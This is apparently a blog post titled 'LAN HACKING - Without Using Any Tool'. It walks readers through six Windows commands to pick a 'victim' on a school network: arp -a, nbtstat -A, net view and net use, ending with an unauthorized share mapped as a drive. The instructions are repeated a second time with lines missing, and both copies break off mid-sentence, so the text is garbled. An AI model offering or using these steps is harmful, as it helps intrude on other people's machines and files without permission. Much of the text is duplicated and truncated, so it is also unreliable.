LAN HACKING - Without Using Any Tool
Hey friends today I am going to teach you how to hack your school LAN without using any tool.
YES, you read it correctly "without using a single tool", using only windows command.
All you need is Luck and Patience. Six simple process then we are done.
1. arp -a
![[Image: arp.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vm8YBNDZ12as7YEzjqOiSMDsLSG83faNLYxW4GUl_sXvbDisYTV8q0nGLxbPeFRe_HoOz6vco4_ZiFPOtI8uAmxW9X9f_fwvZkpJw=s0-d)
This will list the active systems in you LAN, from which you choose a victim,
in my case I choose 10.1.0.73 (after trying more than five victims without +ve result)
2. Next use "nbtstat -A 10.1.0.73"
![[Image: nbtstat2.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ux4CCPP8y-3gE17TAOFXmmxTbtndNxYWDz549BhGL6BtBeNMjEcWYcP4-eByWGino2i8Pf4GCEBC5XO7eZ_DpIrCI3b95cJeLkEwVW2WJAHg=s0-d)
This will give you the netbios name , on the table if you see <20> it means shared is enable,
next you use "net view" to see the list of share documents on the victim system,
if <20> is not there choose another victim.

3. Next use "net view 10.1.0.73"
![[Image: netview.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqDl3570jAhMtWgCofexV0rnakYb-o01qgj6cjS0og5D8xNFcHQA6U7X_C9fDqx5ZnW05Syn8PVlE-op1cNZCGMIVqWATg_WUUuzSJTkuF=s0-d)
If no shared floder is listed then choose
another victim.
If you get "Access is denied"
find another victim.
Now use “ net use “ with any of the shared name and change
to the dir letter in this case G:
4. net use G: \\10.1.0.73\SharedDocs
5. G: <enter key>
![[Image: netuse.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sGF8SJuJUbJOWZ0ZFhPohhy7CkoNbOARgvDydj4YvsXhuQCq7vASPyxOj2RUx-KDSjSDK6eqWgXYgVtPwbMbDo6BW1H2kpjdT6onzqMgQ=s0-d)
6. Start --> My computer --> Network Locations
![[Image: netwk_location.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tUfgrqjou2NxEwWBwahCyoHjHqMc8Y_bo1qMTutQLtfRnNYWgocGuMaTcvv74PX-cl2pNCl8cNj9HIRiNnXxZtHAZD1HCbihYEe-GAjkhKV49ZV_EgRg=s0-d)
From this point if you don't know what to do,
YES, you read it correctly "without using a single tool", using only windows command.
All you need is Luck and Patience. Six simple process then we are done.
1. arp -a
This will list the active systems in you LAN, from which you choose a victim,
in my case I choose 10.1.0.73 (after trying more than five victims without +ve result)
2. Next use "nbtstat -A 10.1.0.73"
This will give you the netbios name , on the table if you see <20> it means shared is enable,
next you use "net view" to see the list of share documents on the victim system,
if <20> is not there choose another victim.
3. Next use "net view 10.1.0.73"
If no shared floder is listed then choose
If you get "Access is denied"
Now use “ net use “ with any of the shared name and change
to the dir letter in this case G:
4. net use G: \\10.1.0.73\SharedDocs
5. G: <enter key>
6. Start --> My computer --> Network Locations
From this point if you don't know what to do,
No comments:
Post a Comment